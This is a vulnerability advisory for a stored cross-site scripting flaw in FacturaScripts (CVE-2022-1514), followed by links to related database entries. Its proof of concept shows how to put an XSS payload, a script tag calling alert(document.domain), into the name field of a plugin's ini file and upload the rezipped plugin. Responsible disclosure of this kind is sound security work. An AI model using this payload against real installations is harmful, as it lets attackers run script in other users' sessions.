Lucene search
Iamshooter994AE2A917-843A-4AE4-8197-8425A596761CHistoryApr 21, 2022 - 6:43 p.m.
Stored XSS via upload plugin functionality in zip format
2022-04-2118:43:55
iamshooter99
www.huntr.dev
8
0.001 Low
EPSS
Percentile
21.6%
Description
Cross-site scripting (XSS) is a common attack vector that injects malicious code into a vulnerable web application. Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application.
Here name parameter is vulnerable to xss. So after replacing the name with the XSS payload in the facturascripts.ini file. XSS payload will be executed after uploading the modified zip file.
Proof of Concept
- log in as a Normal User.
- Download any facturascripts plugin like (https://facturascripts.com/DownloadBuild/93/stable).
- Unzip it locally and modify name = ‘<script>alert(document.domain)</script>’ in facturascripts.ini file.
- Zip it again and upload.
- XSS payload will be executed for all users.
PoC
https://drive.google.com/file/d/18NGs-gTbwJVDB9P_1NCfQGUbjT1Jv9MC/view?usp=sharing
References
Related
cvelist
cvelist
nvd
nvd
CVE-2022-1514
2022-04-28 16:15:08
cve
cve
CVE-2022-1514
2022-04-28 16:15:08
veracode
veracode
Cross-site Scripting (XSS)
2022-04-29 04:16:31
osv
osv
Cross site scripting in FacturaScripts
2022-04-29 00:00:23
CVE-2022-1514
2022-04-28 16:15:08
prion
prion
Cross site scripting
2022-04-28 16:15:00
github
github
Cross site scripting in FacturaScripts
2022-04-29 00:00:23